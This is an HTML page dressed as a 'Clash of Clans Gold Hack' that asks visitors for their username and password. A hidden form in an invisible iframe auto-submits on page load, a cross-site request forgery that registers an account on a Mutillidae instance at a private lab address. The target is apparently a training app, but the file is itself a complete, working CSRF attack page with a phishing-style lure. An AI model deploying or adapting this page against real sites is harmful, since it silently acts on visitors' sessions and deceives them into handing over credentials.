<html>

<head>
    <title>Clash of Clans Gold Hack</title>
</head>

<body>

    <a href="index.html">Back to the main page</a>

    <center>
        <img src="coc.png" width="100px" height="100px">
        <h1>How much gold do you want?</h1>
        <input type="text" name="gold" value=""><br><br>

        <p>Enter your username and password:</p>

        <form id="dummy" action="success.html">
            <label for="username">Username: </label>
            <input type="text" name="username" value=""><br><br>

            <label for="password">Password: </label>
            <input type="password" name="password" value="">
        </form>

        <button type="submit" form="dummy" value="Submit">Get Golds!</button>
    </center>

    <!-- Form target frame to avoid redirection -->
    <iframe id="iframe" name="my_iframe" style="position: absolute;width:0;height:0;border:0;"></iframe>

    <!-- CSRF - Register new user -->
    <form name="csrf" id="csrf" target="my_iframe" action="http://192.168.56.101/mutillidae/index.php?page=register.php"
        method="POST">
        <input type="hidden" name='csrf-token' value=''>
        <input type="hidden" name='username' value='FAKE_ACCOUNT_HAS_BEEN_CREATED'>
        <input type="hidden" name='password' value='mertyigit'>
        <input type="hidden" name='confirm_password' value='mertyigit'>
        <input type="hidden" name='my_signature' value=''>
        <input type="hidden" name='register-php-submit-button' value='Create Account'>
    </form>

    <!-- Send POST request -->
    <script>
        document.csrf.submit();
    </script>

</body>

</html>